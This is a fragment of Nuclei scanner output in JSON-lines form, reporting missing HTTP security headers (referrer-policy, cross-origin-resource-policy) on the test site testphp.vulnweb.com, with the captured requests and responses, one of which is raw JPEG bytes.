Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19\",\"path\":\"/wvstests/pmwiki_2_1_19\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/\",\"request\":\"GET /wvstests/pmwiki_2_1_19 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scripts/\\\"\\u003escripts/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:33.937972783Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"path\":\"/pictures/4.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"request\":\"GET /pictures/4.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4615\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:58 GMT\\r\\nEtag: \\\"4dca64a1-1207\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0000\\u0003\\u0006\\u0002\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u00005\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0002\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004\\u0000\\u0012!\\u00051A\\u0013Q\\u0006\\\"aq\\ufffd\\u0014\\ufffd#2B\\ufffd\\ufffdR\\ufffd\\ufffd%3\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u0000\\u001a\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0003\\u0000\\u0002\\u0005\\u0004\\u0006\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0001\\u0006\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0011\\u0012!1A\\u0004\\u0013\\\"2Qq\\u0005a\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\u0014#Rb\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000K4\\ufffd5\\ufffd\\ufffd\\ufffd\\u001d\\ufffdÔ\\u0012I\\ufffd?\\ufffd#Y6\\ufffd\\ufffd^\\ufffds`\\u001f\\ufffd\\ufffd# 2\\ufffd#Ag\\ufffd\\ufffd\\u0026V\\u0016\\u000f\\ufffd\\ufffd\\ufffd\\u0000:\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd02t\\ufffd\\ufffd\\u003e\\u001cnX3P\\ufffdW\\ufffd\\ufffd\\u0000s\\ufffd\\ufffdD\\ufffd-\\ufffd\\ufffd\\ufffd#\\ufffd\\u00268\\ufffd3\\ufffd\\ufffd\\ufffdq\\ufffd\\u0011\\ufffdA\\ufffd4\\t\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd0+\\ufffd\\ufffd\\ufffdF\\ufffd!\\ufffd4\\ufffd\\\"\\ufffd\\ufffd#\\ufffd)c\\ufffd\\u0002\\ufffd\\u001b\\ufffdzTZ\\ufffd\\u0000\\ufffdWo\\u0015\\ufffd\\u003cs\\r\\ufffd\\ufffd\\u00159D\\ufffd\\ufffd\\u0026\\ufffd\\tRտ\\ufffd\\ufffd\\u000b\\ufffdkZ$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u003e\\ufffd{\\ufffdrB\\ufffd2\\ufffd]\\ufffdU]\\ufffdwy \\u001f\\u001d\\ufffd\\ufffd\\ufffd\\u0010~\\ufffd\\r\\u0006\\ufffdK\\ufffd\\ufffdۊ\\ufffdk\\ufffd~\\ufffd\\ufffd\\u0000\\ufffd\\ufffd8\\u000f\\ufffd\\ufffd~fI\\t\\u001b\\ufffd\\u0015D\\u001e\\ufffd\\ufffd\\u0000\\ufffd\\u001d\\u003c\\ufffd+\\u0014(\\ufffd\\u0000\\u0000v\\u0002\\ufffdj\\u0003\\ufffd?(Xi\\ufffd|\\ufffd\\ufffdRZ\\u001e\\ufffdC\\ufffd\\ufffdo\\ufffd.\\u001e)w ! 3n\\u000b\\ufffd\\u0013E\\ufffd\\ufffd\\ufffdagU˔#BX\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd=M\\ufffd\\ufffd\\ufffd\\u001a\\ufffd}\\ufffd\\u0006\\ufffd\\u0002\\ufffd=\\ufffd\\u0000\\ufffd\\u001c\\ufffd\\ufffdca̭I\\ufffd\\ufffd\\ufffd!\\ufffd\\u0003\\u0000\\ufffdN\\ufffdY\\ufffd\\u0019\\ufffd0UdK\\ufffd\\ufffd\\u0008'\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0000\\ufffdm\\ufffd\\ufffd^\\u003e\\ufffdQ\\ufffd\\ufffd\\u0012*\\ufffd\\ufffdQ\\ufffd\\u000f\\u001ac\\u001c\\ufffd\\u0005\\ufffdF\\ufffd\\ufffd\\ufffd*\\ufffd\\\\\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdՆP\\u0007\\u003c~t\\ufffd\\ufffdU\\u0014\\ufffd2\\ufffd\\u003c\\ufffdgz\\ufffd\\ufffd\\u000f$Y\\ufffd\\ufffd\\ufffde\\ufffd\\u0000\\u0006\\ufffd?3\\u0003\\ufffd\\n\\u003cv\\ufffd\\ufffd\\ufffdX\\u000e`U,p\\u0026\\ufffd7\\ufffdC\\u0017\\ufffdcW\\u0006hP3/\\ufffd\\ufffd[=\\ufffd?\\ufffdf\\u001aL\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdʑ\\ufffd\\ufffdr\\ufffd,\\ufffd\\u0015\\ufffd*\\ufffd\\u0008.\\ufffd\\\"\\ufffd$\\ufffd\\u0016{\\ufffd\\u0018=\\\"l\\ufffd\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffdl\\ufffd\\u003c\\ufffdU#\\ufffd\\ufffdI\\ufffdr\\u0000\\ufffdx\\ufffd\\ufffdֶ\\ufffd/\\ufffdA\\ufffd\\u0015\\ufffdC\\ufffd BĒhj\\ufffd-\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\u0007\\ufffdГ4\\ufffd\\ufffd\\ufffdCL\\ufffd\\u0018\\u0008\\ufffd\\ufffd(\\ufffdh\\ufffd\\u000by\\u001c\\ufffdB\\ufffd\\u0017\\ufffdf\\u0026\\u003cpƱ\\ufffd\\u001a\\ufffd(\\ufffd\\ufffd(\\u0001\\ufffd5\\\\*\\u0005\\n\\ufffdq\\ufffd:\\ufffd\\ufffd\\u001bE\\u0016\\u0026\\\\\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\u0013\\ufffdutg\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\u0019?\\ufffd\\ufffd\\t\\u0014\\ufffd\\ufffd@\\ufffd\\u001e,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd鼓n]/\\ufffd\\ufffd\\ufffdU܄\\ufffd\\ufffd\\ufffdZ\\u0007\\ufffd\\ufffd:[\\ufffdԃdK\\u0004\\ufffd\\ufffde'bHl\\ufffd\\ufffd\\ufffds]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\u000e\\ufffd\\u001c\\ufffdގ\\ufffd9\\ufffd?\\ufffd\\ufffdU\\u0010\\ufffd)\\ufffd\\ufffd\\ufffd:\\ufffd\\u0003+P\\u0004\\ufffd\\ufffdaF\\ufffdX\\ufffd\\u003c\\u001b≩\\ufffd\\ufffd0A\\ufffd\\ufffd\\u0003\\ufffd\\ufffdX]O!\\ufffd\\u001a\\u0003\\ufffd\\ufffd\\ufffdA\\ufffdH\\ufffd\\ufffd\\ufffd\\ufffd6\\ufffd\\ufffd\\ufffd{\\u001f\\ufffdT6\\ufffdǬgvl\\ufffd\\u001e\\ufffd[\\ufffd\\ufffd\\ufffdX\\u001c\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\u0007=\\ufffd\\ufffd\\ufffdo\\ufffdM\\ufffd\\ufffd/}f\\ufffd\\ufffd\\ufffd\\ufffdW\\ufffd\\u0008n\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u0016\\\"I\\ufffd/A\\u001b\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffduy\\\"\\u0000R\\ufffdŀ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\u001cԺ\\ufffdt\\ufffd\\ufffd\\ufffd,\\u0000孨\\u0011\\ufffdP\\ufffdA\\ufffd\\r\\ufffd\\ufffd\\u001a+3;ч\\ufffd\\ufffdF;T{\\ufffd\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffdV\\ufffd6\\ufffduL\\ufffd\\ufffde\\ufffd\\ufffd\\nۈ,YX\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffdN:.*b@\\ufffd\\ufffd\\ufffd\\ufffdQ5}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0007Ցi\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n;\\ufffd\\ufffdד\\ufffdh\\ufffd\\ufffd/\\ufffdӁ\\ufffd\\ufffd\\ufffd9hw\\u001f[\\ufffd\\ufffd\\ufffd\\\\\\\\92_w\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0018\\ufffd\\u000b\\ufffd\\ufffd\\u001f\\ufffd'\\ufffd\\ufffdw3\\ufffd\\ufffd8\\u0001Yop\\u0006ڂ\\ufffdl\\ufffd+C\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdr\\ufffdt`zLV\\ufffdA\\ufffd|\\u001f\\ufffd\\u0003\\ufffd\\ufffd\\u0002;\\u0017\\ufffdD\\ufffdmm\\ufffd\\ufffd\\ufffd\\u000c̾\\ufffd\\ufffd\\ufffd@\\ufffdB7)\\ufffd\\ufffd2\\ufffdH\\ufffd\\ufffdǛ\\ufffd\\\\\\u0011VF\\ufffd};\\ufffd'\\ufffd\\ufffdL*@ۈV4O\\ufffdߑu\\ufffd\\ufffdp1\\ufffd\\ufffdُ\\u0018E\\ufffdhw\\u003e\\ufffd\\ufffd?]\\u003c\\ufffd\\ufffd\\u001fM\\u0010\\ufffdL\\ufffdf\\ufffdSa\\u000cƌ\\n\\u0000}t|_\\ufffd\\ufffd\\ufffd15\\u0000F\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\u0015\\u000fSD\\u001d^\\ufffd\\\\\\ufffd\\ufffd\\t(\\u001cX\\ufffdj\\ufffd:\\ufffd:\\ufffd\\u000c\\ufffd\\u0018\\ufffdy\\u0007]\\ufffd\\u001fm#\\ufffd\\ufffd`\\ufffd\\ufffdS#*\\u0008\\ufffd@f\\u000e\\ufffd\\u0015_sΪ\\u001dy^L\\ufffd\\ufffd\\t\\ufffd1Ŵ\\ufffd\\ufffd\\ufffdk\\ufffd7|7\\u0015|}E\\ufffd\\ufffd\\ufffd#3\\ufffd#29\\ufffdr8`{Q\\ufffd΢\\u000f\\ufffd!\\ufffdF$e۸\\ufffd\\u0018Ճ\\ufffd\\ufffd\\u003cw\\u0014k\\ufffd\\ufffduFN\\u0013㱓\\r\\ufffdѰ\\ufffd\\ufffd\\u001d\\ufffd\\u0000\\ufffd·l\\ufffdU\\u0026\\ufffdr=\\ufffd\\ufffdGϿ\\ufffd\\ufffd\\ufffdͦ\\ufffd4\\ufffd:\\ufffd9\\ufffdC\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0015Z\\u0012|\\ufffd\\\\\\ufffd$\\ufffd\\u0016b\\u0015\\u0000bI \\n\\u001c\\ufffd\\u0000\\u0000\\ufffd\\ufffd^uT\\ufffd\\ufffdf!\\ufffd\\ufffd!\\ufffdV\\ufffd\\ufffdUoɮkށ5\\ufffd\\u001e\\ufffd\\t\\ufffdW\\ufffd3(,\\ufffd~`\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk,\\ufffd\\ufffd\\ufffdo4\\ufffd\\ufffdr80\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd7Uλ\\ufffd\\ufffd\\ufffd\\u0015\\u0001\\ufffd\\ufffd;\\ufffd\\u001et\\ufffdى\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\u003eڂ^E\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd@\\u001as\\ufffd=ŘC\\ufffd\\u0001\\ufffd(\\ufffdp\\ufffd˘ϐ\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\\"\\ufffd\\u003c\\ufffd0\\ufffdz\\ufffd7ȡ\\ufffd\\ufffd\\ufffd\\ufffdyI\\u0004b\\ufffd\\ufffd{\\ufffd\\ufffd8c\\ufffd\\ufffds=%A\\ufffd\\u0026h\\ufffdu\\ufffd-\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffdf\\ufffd\\u0011\\ufffd\\ufffd\\ufffdk\\ufffd#\\ufffd\\ufffd\\u0008\\u001d\\ufffd滊҈D\\ufffd\\ufffdz\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdcP\\u0007a\\ufffdx\\u001fm\\u003c3Y\\ufffd\\ufffdg\\ufffd%\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"a,\\ufffd|\\ufffd\\ufffd\\ufffdk\\u001e\\u0001\\ufffdkM\\ufffd\\u0015h\\u000eݴ\\ufffd\\u0019UG}^z\\ufffd\\u0011r\\ufffd(\\u001e\\ufffdk\\ufffd\\ufffd\\ufffd\\u0014N\\u0026f\\ufffd\\ufffd\\ufffd4p\\ufffd\\ufffd\\ufffd\\ufffd`\\u003c\\ufffd\\ufffd.\\u000f\\ufffdRf\\u000b\\u001cr\\ufffd\\ufffdLE\\ufffd\\ufffd\\u0004w\\ufffda\\ufffd\\u0013;\\ufffdd\\ufffd$X\\ufffd\\u0018\\ufffdo\\ufffd($\\ufffd\\ufffd\\ufffdA\\u001e\\ufffd\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\ufffdt\\ufffd\\ufffd[\\ufffd\\ufffdq'P\\ufffd\\u0014/,\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\u001a\\u001e_\\ufffdq\\ufffd\\ufffd#74I`E-{\\ufffd?\\ufffd\\ufffdF\\ufffd\\u0011|?\\ufffd\\ufffd\\u001eJL\\u0015\\u000c\\ufffd\\ufffd.@!d\\u0003\\ufffd\\u0006\\ufffd\\ufffd\\ufffdoO\\ufffd\\ufffdme\\ufffd\\ufffdt\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd8 \\ufffd\\u00005\\ufffd\\u003e\\ufffd\\ufffd~u\\u0001c\\ufffdB\\ufffd93\\ufffd\\ufffd\\ufffd\\ufffdpS\\u0000\\u0019\\u0008\\ufffd\\ufffd\\ufffd\\u0003nu䊢;P\\ufffd\\ufffd\\ufffd\\ufffdS'\\u0026N\\ufffd\\ufffd2\\\"\\ufffd\\ufffd\\ufffd\\u0006W\\ufffd\\ufffdG\\ufffd\\u003c\\ufffd\\ufffd\\u0011‚ǎIZ\\ufffdl?\\ufffd\\ufffd\\u000f\\u001b\\u0010\\ufffd\\u0000\\u0005YV\\ufffdc\\u000cB\\ufffd\\u0015\\ufffd\\ufffd\\u001am\\ufffdӠ\\ufffd%H\\ufffdDU\\ufffdÿ\\ufffd\\ufffd\\ufffd\\r$\\ufffddր\\ufffdD\\ufffd\\ufffdbu\\u0003\\ufffd,\\ufffd2\\u001c\\ufffd\\ufffd匨X\\ufffd\\ufffd\\ufffd!,\\ufffd\\u0018\\ufffd\\u0017d\\u0011\\\\\\ufffd\\u001ac\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffddIe\\ufffd(\\u001fP\\ufffdIT\\ufffdqUVŅ\\ufffd\\u003c\\u000f\\ufffd:\\ufffdE\\n\\ufffd8\\ufffdH\\ufffdx\\ufffdUm+\\ufffd\\u0006֟\\ufffd\\ufffd\\ufffdp\\ufffd_P\\ufffd'\\ufffd#\\ufffd\\ufffd\\u001a\\u0007*e\\ufffd9\\u0004r\\u0015\\u000e\\ufffd[k0\\ufffd\\ufffd}\\ufffdP~\\ufffdL\\ufffdV'\\u00042\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffdA\\ufffdv\\ufffd\\ufffdH}x\\ufffd\\ufffd\\u0013_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0019L\\ufffdB\\ufffd\\ufffdX\\ufffd\\ufffdB\\u0014\\u0005RV@K\\u0012\\ufffdKpG\\ufffd\\u0000\\u000bDrh\\ufffd\\ufffd3ʞN\\ufffdxZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0006\\ufffd\\ufffdVyY\\ufffdo\\ufffdw\\u0010\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\u0011L\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0005\\u0004\\ufffds\\ufffd\\ufffds\\ufffd\\u003e\\ufffdy\\ufffdm6\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffdK0\\ufffd\\\"X\\ufffd\\ufffd[Q\\ufffd\\u0016\\u000bE\\ufffd$\\ufffd#q\\ufffdg\\ufffd\\u001ck±\\ufffdĦ\\ufffd*\\ufffdһ\\ufffd\\u000cy#m\\u000e,\\u0000\\u00007\\ufffd6\\u0001\\ufffd\\ufffd}#\\ufffd\\u001c\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6ڀ\\ufffd\\ufffd\\ufffdFGs\\ufffd\\ufffd8\\u001bZ\\ufffdZڋ\\ufffdt\\ufffd\\u0017\\ufffd,\\ufffd\\u001a\\ufffd\\ufffdz\\ufffdWj7\\ufffd\\ufffd\\ufffdUR\\ufffd\\ufffds@\\ufffd\\u000e\\u0015\\u0012\\u000c\\ufffdA\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\u0013,H;\\ufffd%\\n\\ufffd\\ufffd\\u0016,_o\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffd]\\ufffd0\\ufffdG\\ufffd6\\ufffd\\ufffd\\u0014\\ufffdn\\ufffd\\u001d\\ufffd\\u0000:\\ufffd*_\\\\\\ufffd\\ufffd1y\\ufffd|\\ufffd\\ufffd\\u0004aM\\ufffdv\\ufffdF\\ufffdB\\ufffd_j\\ufffd\\ufffd(\\ufffd\\u0006\\ufffd\\ufffdo^\\ufffd\\ufffd\\ufffd\\\\\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd23\\u001e\\ufffde\\ufffd\\u001d\\u0013p\\u0004\\ufffd\\u0004\\ufffd\\u0007\\ufffd\\u003c\\u000f\\ufffd\\u001a\\ufffd3\\ufffd$\\u0003\\ufffd\\ufffd\\ufffd\\u0007\\ufffd\\ufffdm\\u0005\\ufffd\\u001cKF\\ufffd\\u003e羝c\\u0015\\u0015ڵ\\ufffd\\ufffd\\ufffd'\\u0013\\u001e\\ufffd\\ufffdv\\\\\\ufffd\\ufffd \\ufffd͖\\ufffd䊾\\ufffd(\\ufffd\\u003c\\ufffd\\ufffd8}\\u000e\\u0012\\ufffdg\\u0026m\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd\\ufffd4Ǒx\\ufffdN\\u0015/]\\ufffds\\ufffd\\ufffd\\u000e\\ufffdohN/O\\ufffdy1!n9e\\ufffd\\ufffd7\\ufffd\\u0018\\ufffd(\\ufffd\\u0006\\ufffdǕ}\\ufffd\\ufffda\\u000c\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffd\\ufffda\\n\\u0001㶎\\ufffd@ \\u001f\\ufffd\\ufffd\\ufffdƍ\\ufffd\\ufffd\\u0007Τ\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0010\\u0000@\\ufffd18\\ufffd\\ufffd\\u001d\\u0017\\u001bX\\u001e\\ufffdBH\\\\c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd܂4B\\u001e~\\ufffd\\\\։\\u0004\\ufffd\\ufffd?MP\\ufffd\\ufffdI\\r\\ufffd\\ufffdݹ\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI\\ufffd wfc\\ufffd\\u0015\\u0014Y\\ufffd\\ufffd@\\u0000{\\u0001\\ufffd\\ufffd4ר.Yp\\ufffd4E\\n#\\ufffdV$|\\ufffd\\u001bo4l]\\u001e;\\ufffd\\ufffd\\ufffd̼KT2wT\\ufffd\\ufffd\\u0013\\ufffd\\u001b?1\\ufffd\\ufffd\\ufffd\\u001e\\u0007\\ufffdIuR\\u003c+7\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd!{\\u0010O\\ufffd\\u0013\\u000e\\ufffd3Y\\u0016D\\ufffdcb\\u0003\\ufffda[\\ufffd\\u0018X\\u0006\\ufffd\\ufffd\\u0001\\ufffdڹ\\u00122[a\\ufffd\\u0007\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\\\,eґAU!@\\ufffd߸\\u001c\\ufffd\\u00007ި{k\\u000f\\ufffd\\ufffd}Y\\ufffd\\ufffd\\ufffd\\ufffd٢\\ufffd\\u000c\\u0018ϰ|\\u000f\\ufffd\\ufffd_\\u000f┃\\u001f\\ufffdފ%\\rD_'r\\ufffd\\ufffd\\u0004W\\u0017ߛ\\u0000\\ufffd1\\ufffd\\u0000\\u001bu\\u0015\\ufffd̝\\ufffd(\\ufffd\\ufffd]\\ufffdT\\u0016\\ufffdl\\ufffd\\ufffdLn\\ufffd\\ufffd\\u0015Wܒöc#v8\\ufffd9m\\\\\\ufffd\\ufffd\\u001bQ\\ufffdBֈ\\ufffd]\\ufffd\\ufffd^\\ufffd9\\u0001\\ufffd.ϕ\\ufffd\\ufffd\\ufffdN\\ufffdş\\ufffd\\ufffdן\\ufffd\\ufffd\\ufffdl\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\ufffdp72\\ufffd\\ufffdܮ\\t\\u001f\\ufffdT\\ufffd\\ufffdn;\\\\M\\u0005\\u0026\\ufffder\\ufffd\\u0006\\ufffdE\\ufffdn\\ufffdQ\\u003cv\\u003cX44:\\u0002Ɖ\\ufffd{\\ufffd\\ufffdh\\ufffd@G\\ufffd\\ufffdU\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd1\\ufffdO\\ufffdY\\ufffdu\\ufffd\\ufffd0ر\\u0016p7\\u001d\\ufffd\\ufffd\\ufffd\\u0000^O\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdWƂ\\ufffd,\\ufffdN\\ufffdN\\ufffd\\ufffd\\u0000I\\ufffdL\\ufffd:\\ufffd%\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\t\\ufffd\\u000cL\\ufffd\\ufffd\\ufffdP\\ufffd\\u001d\\u0016\\u001c\\ufffd#\\r1eC`m\\u000bb\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffdǁE\\u0026\\u0026zez\\ufffd\\ufffd\\ufffd\\u0018(P\\ufffd[\\ufffd\\u001b6\\ufffd7F\\ufffd\\ufffd\\ufffd\\ufffdp5~\\u0014\\ufffd\\ufffd\\u0001FR=\\ufffd\\ufffd|`\\rk\\ufffdT\\ufffd\\ufffde\\ufffdh\\ufffd\\u003e/\\ufffdH\\ufffd}Y\\\\\\ufffd\\ufffdqH\\ufffdG\\ufffd\\u0001~/p\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0000\\ufffd\\u001a)V4\\ufffd\\u0004J\\ufffd\\u000e\\ufffd\\ufffd\\u0018\\ufffdE\\n\\u003c\\ufffd\\ufffd^\\ufffdֆ\\u0008\\ufffd\\u0003\\ufffd\\u001d\\u000c \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd̯~O 